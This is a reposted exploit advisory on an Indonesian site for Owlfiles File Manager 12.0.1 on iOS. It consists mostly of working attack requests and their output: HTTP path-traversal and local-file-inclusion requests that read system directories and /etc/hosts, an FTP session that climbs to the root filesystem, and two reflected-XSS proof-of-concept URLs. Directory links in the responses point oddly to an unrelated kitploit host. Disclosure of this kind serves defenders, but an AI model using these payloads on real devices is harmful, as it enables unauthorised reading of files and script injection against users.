Manajer File Owlfiles 12.0.1 Lintasan Jalur / Penyertaan File Lokal

  • Whatsapp
Landa Driving School Management System 2.0.1 Arbitrary File Upload
Landa Driving School Management System Arbitrary File Upload

News.nextcloud.asia

Owlfiles File Manager versi 12.0.1 menderita inklusi file lokal dan kerentanan jalur traversal.

SHA-256 | 5e1df728b64bebf1797218fca034b9eeed532e773c31131307d679d65b406b40

# Exploit Title: Owlfiles File Manager 12.0.1 - multi vulnerabilities
# Date: Sep 19, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.skyjos.com/
# Software Link:
https://apps.apple.com/us/app/owlfiles-file-manager/id510282524
# Version: 12.0.1
# Tested on: Ios 16.0

###########
path traversal on HTTP built-in server
###########

GET /../../../../../../../../../../../../../../../System/ HTTP/1.1
Host: 192.168.8.101:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)
AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e
Safari/8536.25
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
If-None-Match: 42638202/1663558201/177889085
If-Modified-Since: Mon, 19 Sep 2022 03:30:01 GMT
Connection: close
Content-Length: 0

-------
HTTP/1.1 200 OK
Cache-Control: max-age=3600, public
Content-Length: 317
Content-Type: text/html; charset=utf-8
Connection: Close
Server: GCDWebUploader
Date: Mon, 19 Sep 2022 05:01:11 GMT

<!DOCTYPE html>
<html><head><meta charset="utf-8"></head><body>
<ul>
<li><a href="http://exploit.kitploit.com/2022/09/Cryptexes/">Cryptexes/</a></li>
<li><a href="http://exploit.kitploit.com/2022/09/DriverKit/">DriverKit/</a></li>
<li><a href="http://exploit.kitploit.com/2022/09/Library/">Library/</a></li>
<li><a href="http://exploit.kitploit.com/2022/09/Applications/">Applications/</a></li>
<li><a href="http://exploit.kitploit.com/2022/09/Developer/">Developer/</a></li>
</ul>
</body></html>

#############
LFI on HTTP built-in server
#############

GET /../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
Host: 192.168.8.101:8080
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)
AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e
Safari/8536.25
X-Requested-With: XMLHttpRequest
Referer: http://192.168.8.101:8080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

----

HTTP/1.1 200 OK
Connection: Close
Server: GCDWebUploader
Content-Type: application/octet-stream
Last-Modified: Sat, 03 Sep 2022 01:37:01 GMT
Date: Mon, 19 Sep 2022 03:28:14 GMT
Content-Length: 213
Cache-Control: max-age=3600, public
Etag: 1152921500312187994/1662169021/0

##
# Host Database
#
# localhost is used to configure the loopback interface
# when the system is booting. Do not change this entry.
##
127.0.0.1 localhost
255.255.255.255 broadcasthost
::1 localhost

###############
path traversal on FTP built-in server
###############

ftp> cd ../../../../../../../../../
250 OK. Current directory is /../../../../../../../../../
ftp> ls
200 PORT command successful.
150 Accepted data connection
total 10
drwxr-xr-x 0 root wheel 256 Jan 01 1970 usr
drwxr-xr-x 0 root wheel 128 Jan 01 1970 bin
drwxr-xr-x 0 root wheel 608 Jan 01 1970 sbin
drwxr-xr-x 0 root wheel 224 Jan 01 1970 System
drwxr-xr-x 0 root wheel 640 Jan 01 1970 Library
drwxr-xr-x 0 root wheel 224 Jan 01 1970 private
drwxr-xr-x 0 root wheel 1131 Jan 01 1970 dev
drwxr-xr-x 0 root admin 4512 Jan 01 1970 Applications
drwxr-xr-x 0 root admin 64 Jan 01 1970 Developer
drwxr-xr-x 0 root admin 64 Jan 01 1970 cores
WARNING! 10 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
ftp>

#############
XSS on HTTP built-in server
#############

poc 1:

http://192.168.8.101:8080/download?path=<script>alert(rose)</script>

poc 2:

http://192.168.8.101:8080/list?path=<script>alert(rose)</script>

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.